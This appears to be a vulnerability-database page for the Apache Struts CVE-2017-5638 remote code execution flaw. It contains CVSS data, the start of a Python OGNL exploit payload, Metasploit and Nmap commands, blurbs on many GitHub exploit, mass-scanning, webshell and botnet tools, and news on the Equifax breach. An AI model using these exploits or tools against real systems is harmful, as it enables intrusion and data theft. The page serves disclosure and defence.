CVE-2017-5638

Published: 11/03/2017 Updated: 24/02/2021
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The Jakarta Multipart parser in Apache Struts 2 2.3.x prior to 2.3.32 and 2.5.x prior to 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote malicious users to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

Vulnerable Products

Apache Struts 2.3.x: 2.3.5, 2.3.6, 2.3.7, 2.3.8, 2.3.9, 2.3.10, 2.3.11, 2.3.12, 2.3.13, 2.3.14, 2.3.14.1, 2.3.14.2, 2.3.14.3, 2.3.15, 2.3.15.1, 2.3.15.2, 2.3.15.3, 2.3.16, 2.3.16.1, 2.3.16.2, 2.3.16.3, 2.3.17, 2.3.19, 2.3.20, 2.3.20.1, 2.3.20.2, 2.3.20.3, 2.3.21, 2.3.22, 2.3.23, 2.3.24, 2.3.24.1, 2.3.24.2, 2.3.24.3, 2.3.25, 2.3.26, 2.3.27, 2.3.28, 2.3.28.1, 2.3.29, 2.3.30, 2.3.31

Apache Struts 2.5.x: 2.5, 2.5.1, 2.5.2, 2.5.3, 2.5.4, 2.5.5, 2.5.6, 2.5.7, 2.5.8, 2.5.9, 2.5.10

Vendor Advisories

On March 6, 2017, Apache disclosed a vulnerability in the Jakarta Multipart parser used in Apache Struts2 that could allow an attacker to execute commands remotely on a targeted system by using a crafted Content-Type, Content-Disposition, or Content-Length value. This vulnerability has been assigned CVE-ID CVE-2017-5638. This advisory is availabl ...

Exploits

#!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = "%{(#_='multipart/form-data')" payload += "(#dm=@ognlOgnlContext@DEFAULT_MEMBER_ACCESS)" payload += "(#_memberAccess?" payload += "(#_memberAccess=#dm):" payload += "((#container=#context['comopensymphonyxwork2Action ...
## # This module requires Metasploit: metasploit.com/download # Current source: github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update ...

Mailing Lists

Apache Struts 2 versions 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 remote code execution exploit that provides a reverse shell ...

Nmap Scripts

http-vuln-cve2017-5638

Detects whether the specified URL is vulnerable to the Apache Struts Remote Code Execution Vulnerability (CVE-2017-5638).

nmap -p <port> --script http-vuln-cve2017-5638 <target>

PORT   STATE SERVICE
80/tcp open  http
| http-vuln-cve2017-5638:
|   VULNERABLE
|   Apache Struts Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-5638
|
|     Disclosure date: 2017-03-07
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
|       https://cwiki.apache.org/confluence/display/WW/S2-045
|_      http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html

Metasploit Modules

Apache Struts Jakarta Multipart Parser OGNL Injection

This module exploits a remote code execution vulnerability in Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed via http Content-Type header. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.

msf > use exploit/multi/http/struts2_content_type_ognl
msf exploit(struts2_content_type_ognl) > show targets
    ...targets...
msf exploit(struts2_content_type_ognl) > set TARGET <target-id>
msf exploit(struts2_content_type_ognl) > show options
    ...show and set options...
msf exploit(struts2_content_type_ognl) > exploit

Github Repositories

This is a sample project to demonstrate the Equifax struts vulnerability and how SELinux can help. First of all, please don't disable SELinux! Disabling SELinux seems to be the easiest thing to do when things don't work. After disabling SELinux, things begin to work. However, by doing so, we lose a very powerful security tool. This simple repository will demonstrate the us

Working POC for CVE 2017-5638

apache-struts-v2-CVE-2017-5638 Working POC for CVE 2017-5638. This repo contains a working python example demonstrating the RCE capabilities of CVE 2017-5638. Also included for reference is the Struts Showcase WAR file.

cve-2017-5638 Vulnerable site sample

cve-2017-5638 cve-2017-5638 Vulnerable site sample. This project aims to demonstrate the CVE-2017-5638 exploitation for educational purposes. For more information, see cwiki.apache.org/confluence/display/WW/S2-045. Legal Disclaimer: This project is made for educational and ethical testing purposes only. Attacking targets without prior mutual consent is illegal. It is the e

CVE-2017-5638 This script is intended to validate the Apache Struts 2 vulnerability (CVE-2017-5638), AKA Struts-Shock. It is completely harmless as it does not inject any malicious payload; it only injects an HTTP header named 'STRUTS2-VALIDATION' in order to be able to validate whether it is vulnerable. Because of its multithread capability, it's able to run 25k+ appli

This is a sort of Java port of the Python exploit at: https://www.exploit-db.com/exploits/41570/.

struts2_cve-2017-5638 This is a sort of Java port of the Python exploit at: www.exploit-db.com/exploits/41570/. This software is written to have no external dependencies. DISCLAIMER: This tool is intended for security engineers and appsec guys for security assessments. Please use this tool responsibly. I do not take responsibility for the way in which anyone uses thi

Struts-RCE CVE-2017-5638

struts-rce-cve-2017-5638 Struts-RCE CVE-2017-5638. This is a modified exploit that creates a webshell and provides a bash/cmd-like interface to interact with the webshell in the console.

Struts 2 web app that is vulnerable to CVE-2017-98505 and CVE-2017-5638

Vulnerable Struts2 application. Requirements: Maven (maven.apache.org), Struts <= 2.5.10. CVE-2017-5638 - Apache Struts 2 Multipart form RCE. Requirements: Locate a URL that issues a multipart form POST. Getting Started: The application / server can be started with the following maven command: mvn jetty:run. Run the exploit (www.exploit-db.com/exploits/41570

These are just some scripts which you can use to detect and exploit the Apache Struts Vulnerability (CVE-2017-5638)

Struts-Apache-ExploitPack These are just some scripts which you can use to detect and exploit the Apache Struts Vulnerability (CVE-2017-5638). There is a MassScanner and Exploiter. You can use the scanner to mass scan a list of URLs and then exploit them with the Exploiter. The Exploiter will run arbitrary shell commands on the vulnerable server.

CVE-2017-5638

Jar application to send commands to vulnerable Struts2 apps

Commandline Emulator | CVE-2017-5638. Disclaimer: This is meant for educational and research purposes only. I do not authorize or endorse any illegal or unethical use of this project's contents or information. Proof of concept command line emulator to deliver payloads for CVE-2017-5638. Instructions: Run: java -jar Send.jar. Url: localhost/Webapp/action. Supports most ba

Apache Struts CVE-2017-5638 RCE exploitation

Apache Struts CVE-2017-5638 exploitation. This simple web application is built with vulnerable Apache Struts 2.5.10 (CVE-2017-5638). It's vulnerable to RCE. Starting web application: To start the vulnerable web application, execute: mvn jetty:run. The application will be accessible on port 8012 by default. You can change it: mvn -Djetty.http.port=<port

This is a Valve for Tomcat7 to block the Struts 2 Remote Code Execution vulnerability (CVE-2017-5638)

OgnlContentTypeRejectorValva This is a Valve for Tomcat7 to block the Struts 2 Remote Code Execution vulnerability (CVE-2017-5638)

Kubernetes security presentation This repository contains manifest files for a presentation about Kubernetes security held at a meetup of the "München Kubernetes/Cloud-Native Meetup" group In order to deploy the sample application: kustomize build sample-app/base | kubectl apply -f - In order to deploy the sample application with security context in place:

CVE-2017-5638 Google Dork : "site:com filetype:action"

cve-2017-5638

PoC for CVE: 2017-5638 - Apache Struts2 S2-045

CVE-2017-5638 PoC for CVE: 2017-5638 - Apache Struts2 S2-045

apache-struts2-CVE-2017-5638 Demo Application and Exploit. Sample Apache Struts2 App: Struts2-showcase: mvnrepository.com/artifact/org.apache.struts/struts2-showcase/2.3.12. Exploit Reference: github.com/rapid7/metasploit-framework/issues/8064

detection for Apache Struts recon and compromise

I extended Scott Campbell's script further, made it more complicated :) While "HTTP_StrutsAttack" will stop 100% of the recon, there was still a minuscule chance that if a scanner hits a vulnerable system, even though we'd block the scanner, the vulnerable system might still do the wget included in the HTTP request and execute the malware. Since we aren't blo

Strutsy - Mass exploitation of Apache Struts (CVE-2017-5638) vulnerability

Strutsy Strutsy - Mass exploitation of Apache Struts (CVE-2017-5638) vulnerability. Includes blind and time-based code injection techniques which significantly reduce false negatives. Other features include mass URL imports to scan multiple targets in one go. Usage: python strutsy.py urls.txt windows/linux/default ip-address. All parameters are required. urls.txt - file contai

Example PHP Exploiter for CVE-2017-5638

CVE-2017-5638 Apache Struts2 Example PoC Exploit PHP Code for CVE-2017-5638. Usage: php exploit.php "127.0.0.1:8080/example/index.action" "command" ** USE AT YOUR OWN RISK **

CVE-2017-5638 Converted to Python3. Original: www.exploit-db.com/exploits/41570

Exploit Demo for CVE-2017-5638. Completely based on github.com/piesecurity/apache-struts2-CVE-2017-5638. A realistic scenario where a reference project for a framework is deployed on a container but with terrible consequences. To familiarise yourself, look at the code and compile it. Also investigate the dockerfile - does anything specific rise to get our attention? Shows

struts2-showcase Struts Showcase Application source code packaged in version 2.3.20. Exploits converted to Python3 from immunio/apache-struts2-CVE-2017-5638. Setup for Intellij: Download IntelliJ community. Import from VCS. File > Project Structure > Project SDK > JDK 1.8. Install JDK 8 if it does not exist. View > Maven > Toggle 'Skip Tes

WAF - Getting started with WAF, Bot Detection and Threat Campaigns. Original Lab Guide. This class will focus on a best practice approach to getting started with F5 WAF and application security. This introductory class will give you guidance on deploying WAF services in a successive fashion. This 141 class focuses entirely on the negative security model aspects of WAF configurati

Overview: Git repository for grey hat hacking talk. Agenda: What is a hacker; What is grey hat hacking; Why is it important (survey of fortune 500 companies); Talk about equifax hack link; Run the equifax hack; Show them the code; Walk through what it does; Run the exploit against a server; Show the results; Decode the passwords; Talk about how it was executed and the fallout for equifax

(m4ud) Apache Struts S2-045-RCE CVE-2017-5638. NT: Uses msfvenom to create payloads based on the chosen OS, or use only the -c flag to issue commands without lhost, lport, and osys! Options: -h, --help show this help message and exit; -p RPORT, --port=RPORT RPORT; -t TARGET, --target=TARGET Vulnerable Target; -d

This tool uses an exploit in the Apache Struts framework called CVE-2017-5638 to gain access to a vulnerable server through an OGNL injection. It can be downloaded here (you will need to run it from the command line). Usage: struts_hack [target IP] [target port]

CVE-2017-5638 struts.apache.org/docs/s2-016.html cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017 Metasploit Framework Exploit Module for the Apache Struts Content-Type exploit. Has not been tested against a Windows server, but tested against a Linux server using the payload generic/shell_bind_tcp

Golang exploit for CVE-2017-5638

POC Exploit for CVE-2017-5638. Only use this exploit on systems you own or have explicit rights to test. Installation: If you have go already installed on your computer, go get is the way to go: go get github.com/Greynad/struts2-jakarta-inject. Usage: Single command execution: struts2-jakarta-inject -u <url> -c 'id'. Pseudo interactive shell: struts2-jakarta-inje

Apache Struts (CVE-2017-5638) Shell

StrutsShell Apache Struts (CVE-2017-5638) Shell. Introduction: The "LowNoiseHG (LNHG) Struts Shell" ("StrutsShell" from now on) was conceived in March 2017 after realizing the usefulness of not having to exploit Apache Struts CVE-2017-5638 manually (HTTP GET requests by hand) and after realizing the respective metasploit module for this vulnerability did not w

struts2-showcase Struts Showcase Application source code packaged in version 2.3.20: archive.apache.org/dist/struts/2.3.20/. Exploits converted to Python3 from github.com/immunio/apache-struts2-CVE-2017-5638. Example exploit on Windows: python exploit3.py dir

vulnerability_struts-2331 Build the struts-2331 (CVE-2017-5638) environment

Container Security Demo Documentation. Welcome to the Container Security Demo Documentation. This package contains all required files to demo Cloud One - Container Security from zero to hero, even if you don't have a Kubernetes cluster. Requirements: Cloud One Account - Any region will do - cloudone.trendmicro.com. Cloud One API Key - cloudone.trendmicro.com/

THIS IS UNDER CONSTRUCTION. Welcome to the F5 Advanced Web Application Firewall lab guide. This series of lab exercises is intended to explain and demonstrate key features of F5 Advanced Web Application Firewall. The Blueprint which we use as the base for all upcoming Modules is called Advanced WAF Demo v16 + LCC, ML and Device ID+. The intent is to provide demos on the following con

SlicePathURL Usage • Installation - Installation & Requirements: > go install github.com/erickfernandox/slicepathurl@latest OR > git clone github.com/erickfernandox/slicepathurl.git > cd slicepathurl > go build slicepathurl.go > chmod +x slicepathurl > ./slicepathurl -h

cve-2017-5638 Reference 1, Reference 2, Reference 3, Reference 4

Apache-Struts-2-CVE-2017-5638-Exploit This exploit exploits the Apache Struts2 vulnerability (CVE-2017-5638), allowing us to execute commands remotely on the apache server. How to use: $ sudo python Struts2.py ******************************************* * [!] Exploit Apache Struts2 {*}DEMO * ******************************************* Code

An Ubuntu 16.04 VM Vulnerable to CVE 2017-5638

A Vulnerable Apache Struts Application. Confirmed Vulnerabilities: CVE 2017-5638 - Remote Command Vulnerability in Apache Struts - cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638. Requirements: Vagrant, VirtualBox, SearchSploit (Optional). Setup: $ git clone github.com/evolvesecurity/vuln-struts2-vm.git $ cd vuln-struts2-vm Build Virtual M

(CVE-2017-5638) XworkStruts RCE Vuln test script

XworkStruts-RCE (CVE-2017-5638) XworkStruts RCE Vuln test script. Usage> python XworkStruts RCE (CVE-2017-5638).py <dst_ip> <dst_port>. Script based on Python2. Just using Vuln Test for your System.

CVE-2017-5638 Apache Struts 2 Vulnerability Remote Code Execution. Reverse shell from target. Author: anarc0der - github.com/anarcoder. Tested with tomcat8. Install tomcat8. Deploy WAR file github.com/nixawk/labs/tree/master/CVE-2017-5638. Ex: Open: $ nc -lnvp 4444 python2 struntsrce.py --target=localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --

CVE-2017-5638 (PoC Exploits)

CVE-2017-5638 CVE-2017-5638 (PoC Exploits)

An S2-045 remote command execution script, semi-interactive shell

S2-045 RCE. Usage: python CVE-2017-5638-S2-045.py url. The script's function is limited to command execution; an infinite while loop handles the interaction for executing multiple commands.

CVE-2017-5638 - Exploit

S2-045 CVE-2017-5638 Exploit. Remediation: Detection method: look at the struts-core.x.x.jar in the /WEB-INF/lib/ directory under the web directory; if its version is between Struts 2.3.5 and Struts 2.3.31 or between Struts 2.5 and Struts 2.5.10, the vulnerability exists. Update to Struts 2.3.32 or Struts 2.5.10.1, or use a third-party protective device for protection.

ExploitDev Journey #10 | CVE-2017-5638 | Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution. Original Exploit: www.exploit-db.com/exploits/41570. Exploit name: Apache Struts RCE. CVE: 2017-5638. Lab: Stratosphere - HackTheBox. Description: There is a vulnerability in Apache struts that allows a remote attacker to execute code and system comma

2017 Equifax data breach. Contents: Some important information; What kinds of data were accessed?; How was the data breached?; The US says members of the Chinese military hacked Equifax; The US indictment; DOJ evidence that China's military personnel are behind the Equifax data breach; Weak evidence; How the hackers were able to hide their tracks; Other interesting information; L

Struts02 s2-045 exploit program

CVE-2017-5638 | Struts s2-045. Description: It is possible to perform an RCE attack with a malicious Content-Type value. If the Content-Type value isn't valid, an exception is thrown which is then used to display an error message to a user. Affected versions: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10. Exploitation. Remediation: To remediate this issue, update the affec

Must-read and must-know OWASP 2021 for cybersecurity personnel. Messages. Recommended books: "White Hat Talks Web Security", "sqlmap from Beginner to Advanced", "WireShark Packet Capture Analysis". A01:2021-Broken Access Control. Moved up from fifth place; 94% of applications were tested for some form of broken access control. The 34 CWEs mapped to Broken Access Control occurred more often in applications than any

h2_Goat Security Misconfiguration. Overview of the study: This category represents the fifth most common security vulnerability according to the OWASP Top 10 critical security risks of 2021. 90% of the applications were tested. From this test, a 4.51% crash rate and more than 280 K CWE were found for this category. Among the security vulnerabilities identified by the CWE, CWE-16 and

SlicePathsURL Usage • Installation • Why use SlicePathsURL? • How does SlicePathsURL work? SlicePathsURL slices a URL into directory levels to complement tools like Nuclei in searching for vulnerabilities in directories beyond the root of the URL - Installation & Requirements: go install github.com/erickfernandox/slicepathsurl@latest

Working Python test and PoC for CVE-2018-11776, includes Docker lab

CVE-2018-11776-Python-PoC hook-s3c (github.com/hook-s3c), @hook_s3c on twitter. Working Python test and PoC for CVE-2018-11776, originally appearing on github.com/hook-s3c/CVE-2018-11776-Python-PoC. What's going on? Man Yue Mo from Semmle has disclosed a Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request. Versions affected are 2

Struts2 S2-045(CVE-2017-5638)Exp with GUI

#Struts2 S2-045 (CVE-2017-5638) Exp Tools. #Exp Function: Command Execute; Get Target Website's Physical Path; File Upload; Getshell; Default Webshell For Chopper; Support HTTP/HTTPS; Support URL With Any Port. Note: Default Webshell's Password is s2045@exp. #Notice: The Project Is Intended For Educational/Research Purposes. Mail: flyteas@gmail.com

Exploit Demo for CVE-2017-5638. Completely based on github.com/piesecurity/apache-struts2-CVE-2017-5638. Usage: Pre-requisites: have python, docker, maven and a jdk installed. Clone this repo. Run ./mvnw clean package in project root. Run docker build -t hack. Run docker run -d -p 8080:8080 hack. a. If 8080 is in use, map to an open port, e.g. -p 8888:8080. Once container com

Exploitable target to CVE-2017-5638

Exploit Demo for CVE-2017-5638. Completely based on github.com/piesecurity/apache-struts2-CVE-2017-5638. Usage: Pre-requisites: have python, docker, maven and a jdk installed. Clone this repo. Run mvn clean package in project root. Run docker build -t hack. Run docker run -d -p 8080:8080 hack. Once container comes online, verify by running in browser. To begin testing RCE

Telegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638)

strutszeiro Telegram Bot to manage botnets created with struts vulnerability (CVE-2017-5638). #Dependencies: pip install -r requeriments.txt. #Config: Create a telegram bot, save the API token in config/token.conf. Create a telegram group, save the group id in config/group.conf. #Start: python strutszeiro.py. #Telegram Usage: /add url - test vulnerability and add the new server; /exploit

CVE-2017-5638 Table of Contents: Overview, Dependencies, Usage. Overview: This project is a proof-of-concept for the Apache Struts vulnerability. The goal was to create software that can generate and test random IPs for the vulnerability described above. Use this project at your own risk and for educational purposes only. Dependencies: cURL. cURL is used to send the crafted header t

test struts2 vulnerability CVE-2017-5638 in Mac OS X

test_struts2_vulnerability_CVE-2017-5638_in_MAC_OS_X test struts2 vulnerability CVE-2017-5638 in Mac OS X. ###download test web app and run it in tomcat. #install tomcat: brew install tomcat. #confirm where the tomcat is installed: ls -lF `which catalina`. #confirm tomcat home dir: ls -lF /usr/local/Cellar/tomcat/8.5.11/libexec. #create web app "struts2" in webapps of tomcat

CVE: 2017-5638 in different formats

CVE-2017-5638 CVE: 2017-5638 in different formats. Most of them will require you to enter the url and you might want to change the command. Please issue pull requests if you can make it so you can enter a url and command! PHP - Example: localhost/2017-5638.php?url=TARGET&cmd=command. XMLHttpRequest - CVE-2017-5638.js -- will require Access-Control-Allow-Origin on tar

Example PoC Code for CVE-2017-5638 | Apache Struts Exploit

CVE-2017-5638 PoC Code in Python | DORK: ext:action. Example PoC Code for CVE-2017-5638 | Apache Struts Exploit | DORK: ext:action. USAGE: python struts.py victimsite dir. The initial Python Script that was Posted didn't correctly format the Content-Type Header. I recoded the Content Type Header to properly format Content-Type:%20{Exploit}. I also added a logging and

Demo app of THAT data broker's security breach

CVE-2017-5638 Demo app of, yes, that data broker's security breach. Includes exploit code. Basic usage (launch): mvn jetty:run. Then go to localhost:8080/basic-struts/index.action. You should see the Welcome to Struts 2! message. Vulnerability scan: mvn site. Acknowledgements: Exploit code adapted from immunio's repo

How to Demo Container Security. This is a how-to demo guide for Cloud One Container Security, where we'll be able to see in action the power of Runtime Scanning and Runtime Security working together to provide visibility and control over your cluster, including some shortcuts to deploy your own EKS cluster and Calico. Good to Know: This demo is targeted to give a better unde

PII Leak Prevention Guide. How to identify & prevent PII leaks -- learnings from 25+ major data breaches. Today, personally identifiable information (PII) faces a wide variety of threats. In order to secure PII from leakage and exposure, organizations need to understand the nature of these threats as well as the tools they have at their disposal to ensure that their data

DevSecOps Pipeline Demo

DevSecOps Pipeline Demo. Requirements: This demo uses VirtualBox to deploy a local GitLab instance and configure it to run a DevSecOps Pipeline demo. This demonstrates a DevSecOps Pipeline using an application that contains the Struts2 vulnerability (CVE-2017-5638) made famous in the Equifax breach. Pre-requisites: VirtualBox, Vagrant, Python. You will also need the Vagrant Host

This is the Apache Struts CVE-2017-5638 Struts 2 vulnerability, the same CVE that resulted in the Equifax database breach.

Common-Vulnerability-and-Exploit-5638. This is the Apache Struts CVE-2017-5638 Struts 2 vulnerability, the same CVE that resulted in the Equifax database breach. A write-up on how to apply this exploit and how to patch against it.

Exploit Demo for CVE-2017-5638. Completely based on github.com/piesecurity/apache-struts2-CVE-2017-5638. A realistic scenario where a reference project for a framework is deployed in a container, but with terrible consequences. To familiarise yourself, look at the code and compile it. Also investigate the Dockerfile: does anything specific rise to get our attention? Shows

Install anchore-engine with helm: helm install anchore -f anchore_values.yaml anchore/anchore-engine. Configure anchore-cli: ANCHORE_CLI_USER=admin ANCHORE_CLI_PASS=$(kubectl get secret --namespace default anchore-anchore-engine-admin-pass -o jsonpath="{.data.ANCHORE_ADMIN_PASSWORD}" | base64 --decode; echo) ANCHORE_CLI_URL=http:/

Check for Struts Vulnerability CVE-2017-5638

strutser: This program checks for CVE-2017-5638. Usage of ./strutser: -c, --concurrency int Concurrent HTTP requests (default 10); -f, --file string File containing targets; -p, --ports intSlice Ports to check (default [80]); -t, --timeout int Timeout on HTTP requests (default 15). Tips: For multiple ports, use the --ports argum

An exploit for CVE-2017-5638 Remote Code Execution (RCE) Vulnerability in Apache Struts 2

Stutsfi An exploit for CVE-2017-5638 Remote Code Execution (RCE) Vulnerability in Apache Struts 2

Sonatype Platform Demo (JAVA). Exploit Demo for CVE-2017-5638, based on github.com/piesecurity/apache-struts2-CVE-2017-5638. Demo-able Features: Java Application: Struts2 2.5.10 as vulnerable. Ahab: Configuration of Ahab in the Dockerfile. IDE Integration. Breaking Changes. Transitive Solver. IaC Pack: awslargetfplan included. Azure DevOps: azure-pipelines.yml

Exploit Demo for CVE-2017-5638. Completely based on github.com/piesecurity/apache-struts2-CVE-2017-5638. Usage: Pre-requisites: have docker and a jre installed. Fork this repo, run ./mvnw clean package in project root, run docker build -t hack ., run docker run -d -p 9080:8080 hack. Once the container comes online, verify by opening localhost:9080 in a browser. To begin te

(CVE-2017-5638) XworkStruts RCE Vuln test script

XworkStruts-RCE (CVE-2017-5638) XworkStruts RCE vuln test script. Usage: python "XworkStruts RCE (CVE-2017-5638).py" <dst_ip> <dst_port>. Script based on Python2. Not for attack, just for vulnerability testing of your own system.

st2-046-poc CVE-2017-5638

Struts2 Content-Disposition filename null-byte variant of CVE-2017-5638 (Struts2 Security Bulletin S2-046). A null byte (\x00) in a request's Content-Disposition header filename field can trigger an InvalidFileNameException with the same (client-controlled) filename string in the exception message, which can be used to trigger OGNL evaluation during error handling. Note tha

ECE 9069 Hacking Companion Notes on Apache Struts CVE-2017-5638. Source. Background: Equifax Data Breach. Between May and July 2017, a massive data breach affected over 140 million users. Stolen files contained critical personal information: credit card numbers, SINs, driver's license numbers. Equifax paid up to $575 million. Caused by a 0-day attack on Apache Struts CVE-2017-

struts2-showcase: Struts Showcase Application source code packaged in version 2.3.20. Exploits converted to Python3 from immunio/apache-struts2-CVE-2017-5638. Setup for IntelliJ: Download IntelliJ community. Import from VCS. File > Project Structure > Project SDK > JDK 1.8 (install JDK 8 if it does not exist). View > Maven > Toggle 'Skip Tes

Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner

Recent Articles

Beapy: Cryptojacking Worm Hits Enterprises in China
Symantec Threat Intelligence Blog • Security Response Attack Investigation Team • 24 Apr 2023

Cryptojacking campaign we have dubbed Beapy is exploiting the EternalBlue exploit and primarily impacting enterprises in China.

Posted: 24 Apr, 2019 | 6 Min Read | Threat Intelligence
Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks. Beapy act...

Critical Apache Struts RCE vulnerability wasn't fully fixed, patch now
BleepingComputer • Ax Sharma • 13 Apr 2022

Apache has fixed a critical vulnerability in its vastly popular Struts project that was previously believed to have been resolved but, as it turns out, wasn't fully remedied.
As such, Cybersecurity and Infrastructure Security Agency (CISA) is urging users and administrators to upgrade to the latest, patched Struts 2 versions.
Struts is an open-source application development framework used by Java web developers for building model–view–controller (MVC) apps.
T...

Gitpaste-12 Worm Targets Linux Servers, IoT Devices
Threatpost • Lindsey O'Donnell • 06 Nov 2020

Researchers have uncovered a new worm targeting Linux based x86 servers, as well as Linux internet of things (IoT) devices (that are based on ARM and MIPS CPUs).
Of note, the malware utilizes GitHub and Pastebin for housing malicious component code, and has at least 12 different attack modules available – leading researchers to call it “Gitpaste-12.” It was first detected by Juniper Threat Labs in attacks on Oct. 15, 2020.
“No malware is good to have, but worms are particu...

PoC Exploit Targeting Apache Struts Surfaces on GitHub
Threatpost • Tom Spring • 14 Aug 2020

Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.
The Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as CVE-2019-0230 and CVE-2019-0233. Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts ...

US-CERT lists the 10 most-exploited security bugs and, yeah, it's mostly Microsoft holes people forgot to patch
The Register • Shaun Nichols in San Francisco • 14 May 2020

Update, update, update. Plus: Flash, Struts, Drupal also make appearances

Vulnerabilities in Microsoft Windows, Office, and Windows Server, for which patches have been available for years, continue to be the favorite target for hackers looking to spread malware.
A list posted by US-CERT this week rattles off the 10 most oft-targeted security vulnerabilities during the past three years, and finds that, shock horror, for the most part, keeping up with patching will keep you safe.
Microsoft ranks highly in the list because its software is widely used, and pro...

Panda Threat Group Mines for Monero With Updated Payload, Targets
Threatpost • Lindsey O'Donnell • 17 Sep 2019

The Panda threat group, best known for launching the widespread and successful 2018 “MassMiner” cryptomining malware campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.
While considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services...

Equifax to Pay $700 Million in 2017 Data Breach Settlement
Threatpost • Lindsey O'Donnell • 22 Jul 2019

Equifax will pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers.
The consumer credit reporting agency on Monday said it will dish out $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S, and $100 million in civil penalties to the Consumer Financial Protection Bureau (CFPB). If the initial amount does not cover ...

Mirai, Gafgyt IoT Botnets Reach To the Enterprise Sector
BleepingComputer • Ionut Ilascu • 11 Sep 2018

Mirai and Gafgyt, two of the best known IoT botnets, have forked once again, with the new variants peeking at the enterprise sector for creating or replenishing their denial-of-service resources for distributed attacks.
The code for both malware pieces reached the public space a few years back and aspiring cybercriminals began spawning their own revisions.
Most of the times there is nothing interesting about the mutations, but the latest alternatives show a predilection for business ...

Hackers latch onto new Apache Struts megavuln to mine cryptocurrency
The Register • John Leyden • 30 Aug 2018

Underground forums alight with Struts chat, we hear

A recently uncovered critical vulnerability in Apache Struts is already being exploited in the wild.
Threat intel firm Volexity has warned that hackers are abusing the CVE-2018-11776 vuln to attack systems running Apache Struts 2, a popular open-source framework for developing applications in Java. Specifically, some nasty characters have abused the flaw while trying to install the CNRig cryptocurrency miner, researchers said.
The vulnerability appears to be easier to exploit than th...

MassMiner Takes a Kitchen-Sink Approach to Cryptomining
Threatpost • Tara Seals • 03 May 2018

Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin’-somethin’ to the mix. It targets Windows servers with a variety of recent and well-known exploits – all within a single executable.
In fact, MassMiner uses a veritable cornucopia of attacks: The EternalBlue National Security Agency hacking tool (CVE-2017-0143), which it uses to install DoublePulsar and the Gh0st ...

New MassMiner Malware Targets Web Servers With an Assortment of Exploits
BleepingComputer • Catalin Cimpanu • 02 May 2018

Security researchers have detected a new wave of cryptocurrency-mining malware infecting servers across the web, and this one is using multiple exploits to gain access to vulnerable and unpatched systems to install a Monero miner.
Experts from AlienVault say this new campaign, which they dubbed MassMiner, uses exploits for vulnerabilities such as CVE-2017-10271 (Oracle WebLogic), CVE-2017-0143 (Windows SMB), and CVE-2017-5638 (Apache Struts).
The MassMiner crew sure has an excellen...

Equifax Adds 2.4 Million More People to List of Those Impacted By 2017 Breach
Threatpost • Lindsey O'Donnell • 02 Mar 2018

Equifax said that an additional 2.4 million Americans have had their personal data stolen as part of the company’s massive 2017 data breach, including their names and some of their driver’s license information.
The additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.
The consumer credit reporting agency on Thursday said that as part of an “ongoing analysis”...

Malware Epidemic: Monero Mining Campaigns Are Becoming a Real Problem
BleepingComputer • Catalin Cimpanu • 25 Jan 2018

Malware that secretly mines Monero is becoming a real problem in the real world, with the number of different incidents growing with each week. For example, only this past week, three new attacks came to light.
The reason is simple and is the same one given by all security experts who paid close attention to the cryptocurrency market in the past year.
The number of malware campaigns spreading Monero-mining threats grew exponentially with Monero's trading price. As the price rose, the...

"Zealot" Campaign Uses NSA Exploits to Mine Monero on Windows and Linux Servers
BleepingComputer • Catalin Cimpanu • 16 Dec 2017

An aggressive and sophisticated malware campaign is currently underway, targeting Linux and Windows servers with an assortment of exploits with the goal of installing malware that mines the Monero cryptocurrency.
The campaign was detected by security researchers from F5 Networks, who named it "Zealot", after zealot.zip, one of the files dropped on targeted servers.
According to Maxim Zavodchik and Liron Segal, two security researchers for F5 Networks, the attackers are scanning the In...

IRS tax bods tell Americans to chill out about Equifax
The Register • Richard Chirgwin • 18 Oct 2017

Your personal data was probably already in crims' hands

The United States Internal Revenue Service has said that citizens affected by the Equifax breach need not panic, because it probably didn't reveal anything that hasn't already been stolen and the agency has tooled up to deal with fraudulent tax claims.
